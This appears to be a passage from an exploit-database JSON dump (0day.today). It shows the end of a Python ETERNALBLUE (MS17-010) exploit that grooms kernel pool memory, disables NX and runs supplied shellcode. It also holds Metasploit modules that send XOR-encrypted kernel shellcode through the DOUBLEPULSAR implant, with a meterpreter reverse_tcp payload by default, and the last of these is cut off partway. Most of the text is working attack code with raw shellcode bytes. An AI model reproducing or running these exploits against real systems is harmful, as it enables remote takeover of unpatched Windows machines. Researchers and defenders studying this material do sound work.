pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB() # must be success\r\n if recvPkt.getNTStatus() == 0:\r\n print('got good NT Trans response')\r\n else:\r\n print('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()))\r\n sys.exit(1)\r\n \r\n i = firstDataFragmentSize\r\n while i < len(data):\r\n sendSize = min(4096, len(data) - i)\r\n if len(data) - i <= 4096:\r\n if not sendLastChunk:\r\n break\r\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\r\n i += sendSize\r\n \r\n if sendLastChunk:\r\n conn.recvSMB()\r\n return i\r\n \r\n \r\n# connect to target and send a large nbss size with data 0x80 bytes\r\n# this method is for allocating big nonpaged pool on target\r\ndef createConnectionWithBigSMBFirst80(target, for_nx=False):\r\n sk = socket.create_connection((target, 445))\r\n pkt = '\\x00' + '\\x00' + pack('>H', 0x8100)\r\n # There is no need to be SMB2 because we want the target free the corrupted buffer.\r\n # Also this is invalid SMB2 message.\r\n # I believe NSA exploit use SMB2 for hiding alert from IDS\r\n #pkt += '\\xffSMB' # smb2\r\n # it can be anything even it is invalid\r\n pkt += 'BAAD' # can be any\r\n if for_nx:\r\n # MUST set no delay because 1 byte MUST be sent immediately\r\n sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\r\n pkt += '\\x00'*0x7b # another byte will be sent later to disabling NX\r\n else:\r\n pkt += '\\x00'*0x7c\r\n sk.send(pkt)\r\n return sk\r\n \r\n \r\ndef exploit(target, shellcode, numGroomConn):\r\n # force using smb.SMB for SMB1\r\n conn = smb.SMB(target, target)\r\n \r\n # can use conn.login() for ntlmv2\r\n conn.login_standard('', '')\r\n server_os = conn.get_server_os()\r\n print('Target OS: '+server_os)\r\n if not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")):\r\n print('This exploit does not support this target')\r\n sys.exit()\r\n \r\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\r\n \r\n # Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command\r\n progress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False)\r\n \r\n # Another NT transaction for disabling NX\r\n nxconn = smb.SMB(target, target)\r\n nxconn.login_standard('', '')\r\n nxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\r\n nxprogress = send_nt_trans(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False)\r\n \r\n # create some big buffer at server\r\n # this buffer MUST NOT be big enough for overflown buffer\r\n allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x2010)\r\n \r\n # groom nonpaged pool\r\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\r\n srvnetConn = []\r\n for i in range(numGroomConn):\r\n sk = createConnectionWithBigSMBFirst80(target, for_nx=True)\r\n srvnetConn.append(sk)\r\n \r\n # create buffer size NTFEA_SIZE at server\r\n # this buffer will be replaced by overflown buffer\r\n holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE-0x10)\r\n # disconnect allocConn to free buffer\r\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\r\n allocConn.get_socket().close()\r\n \r\n # hope one of srvnetConn is next to holeConn\r\n for i in range(5):\r\n sk = createConnectionWithBigSMBFirst80(target, for_nx=True)\r\n srvnetConn.append(sk)\r\n \r\n # remove holeConn to create hole for fea buffer\r\n holeConn.get_socket().close()\r\n \r\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\r\n # first trigger to overwrite srvnet buffer struct for disabling NX\r\n send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)\r\n recvPkt = nxconn.recvSMB()\r\n retStatus = recvPkt.getNTStatus()\r\n if retStatus == 0xc000000d:\r\n print('good response status for nx: INVALID_PARAMETER')\r\n else:\r\n print('bad response status for nx: 0x{:08x}'.format(retStatus))\r\n \r\n # one of srvnetConn struct header should be modified\r\n # send '\\x00' to disable nx\r\n for sk in srvnetConn:\r\n sk.send('\\x00')\r\n \r\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\r\n # second trigger to place fake struct and shellcode\r\n send_trans2_second(conn, tid, feaList[progress:], progress)\r\n recvPkt = conn.recvSMB()\r\n retStatus = recvPkt.getNTStatus()\r\n if retStatus == 0xc000000d:\r\n print('good response status: INVALID_PARAMETER')\r\n else:\r\n print('bad response status: 0x{:08x}'.format(retStatus))\r\n \r\n # one of srvnetConn struct header should be modified\r\n # a corrupted buffer will write recv data in designed memory address\r\n for sk in srvnetConn:\r\n sk.send(fake_recv_struct + shellcode)\r\n \r\n # execute shellcode\r\n for sk in srvnetConn:\r\n sk.close()\r\n \r\n # nicely close connection (no need for exploit)\r\n nxconn.disconnect_tree(tid)\r\n nxconn.logoff()\r\n nxconn.get_socket().close()\r\n conn.disconnect_tree(tid)\r\n conn.logoff()\r\n conn.get_socket().close()\r\n \r\n \r\nif len(sys.argv) < 3:\r\n print(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0]))\r\n sys.exit(1)\r\n \r\nTARGET=sys.argv[1]\r\nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])\r\n \r\nfp = open(sys.argv[2], 'rb')\r\nsc = fp.read()\r\nfp.close()\r\n \r\nif len(sc) > 4096:\r\n print('Shellcode too long. The place that this exploit put a shellcode is limited to 4096 bytes.')\r\n sys.exit()\r\n \r\n# Now, shellcode is known. create a feaList\r\nfeaList = createFeaList(len(sc))\r\n \r\nprint('shellcode size: {:d}'.format(len(sc)))\r\nprint('numGroomConn: {:d}'.format(numGroomConn))\r\n \r\nexploit(TARGET, sc, numGroomConn)\r\nprint('done')\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/27803", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-12-24T11:25:14", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-04T00:00:00", "type": "zdt", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148"], "modified": "2020-02-04T00:00:00", "id": "1337DAY-ID-33895", "href": "https://0day.today/exploit/description/33895", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/33895", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T03:24:42", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-04T00:00:00", "type": "zdt", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147"], "modified": "2019-10-04T00:00:00", "id": "1337DAY-ID-33313", "href": "https://0day.today/exploit/description/33313", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload', {}],\n ['Neutralize implant', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_SAFE],\n 